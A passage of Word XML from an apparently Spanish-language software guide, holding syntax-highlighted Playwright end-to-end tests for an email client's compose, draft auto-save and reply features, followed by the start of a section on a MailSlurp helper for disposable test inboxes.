      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> { createInbox</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> waitForEmail } </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'./helpers/mailslurp'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">test</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">describe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'Flujo de Redacción y Envío'</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test</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'redactar y enviar email a inbox real'</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mmentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// Crear inbox desechable para recibir el email</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">const</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> inbox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createInbox</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'/compose'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// Llenar campos del email</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'[data-testid="to-input"]'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> inbox</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">emailAddress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'[data-testid="subject-input"]'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'E2E Test Subject'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// Escribir en el editor Tiptap (contenteditable)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">const</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> editor </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</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'.ProseMirror'</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editor</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editor</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">fill</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'Este es un email enviado desde Playwright E2E.'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// Enviar</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'[data-testid="send-button"]'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// Verificar mensaje de éxito</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'[data-testid="send-success"]'</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br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// Verificar que llegó al inbox (via MailSlurp API)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">const</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> receivedEmail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waitForEmail</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(inbox</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">id</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> { subjectContains</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'E2E Test Subject'</w:t>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(receivedEmail)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">toBeDefined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(receivedEmail</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">subject</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'E2E Test Subject'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test</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'auto-save de borrador cada 10 segundos'</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'/compose'</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'[data-testid="to-input"]'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'draft@example.com'</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'[data-testid="subject-input"]'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'Draft Auto-Save'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editor </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</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'.ProseMirror'</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editor</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editor</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">fill</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'Contenido del borrador...'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// Esperar auto-save (10 segundos)</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waitForTimeout</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">11000</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'[data-testid="last-saved"]'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">))</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">toContainText</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'Guardado'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// Recargar y verificar que se restauró</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reload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'[data-testid="subject-input"]'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">))</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">toHaveValue</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'Draft Auto-Save'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test</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'reply cita el email original'</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mmentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// Seed: crear un email de prueba vía API</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'/inbox'</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waitForSelector</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'[data-testid="email-list-item"]'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// Seleccionar primer email</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'[data-testid="email-list-item"]:first-child'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// Click en responder</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'[data-testid="reply-button"]'</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toHaveURL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">\/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">compose</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">\?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">replyTo=/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// Verificar que el asunto tiene "Re:"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">const</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> subject </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>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inputValue</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'[data-testid="subject-input"]'</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(subject)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">toMatch</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">^</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">Re: /</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// Verificar que el editor contiene la cita</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">const</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> editorHtml </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>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'.ProseMirror'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">innerHTML</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(editorHtml)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">toContain</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'blockquote'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09"/>
    <w:bookmarkStart w:id="210" w:name="mailslurp-para-email-real-en-e2e"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">12.3.2 MailSlurp para Email Real en E2E</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">MailSlurp proporciona inboxes desechables programáticos con SMTP y API REST, ideal para testing de flujos de correo en CI/CD</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[324]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// packages/web/e2e/helpers/mailslurp.ts</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">import</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> { MailSlurp } </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'mailslurp-client'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">const</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> mailslurp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MailSlurp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">({ apiKey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MAILSLURP_API_KEY</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">!</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> })</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createInbox</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">() {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ControlFlowTok"/>
        </w:rPr>
        <w:t xml:space="preserve">return</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> mailslurp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">createInbox</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserv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waitForEmail</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  inboxId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options</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> { subjectContains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timeout</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 subjectContains</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> timeout </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
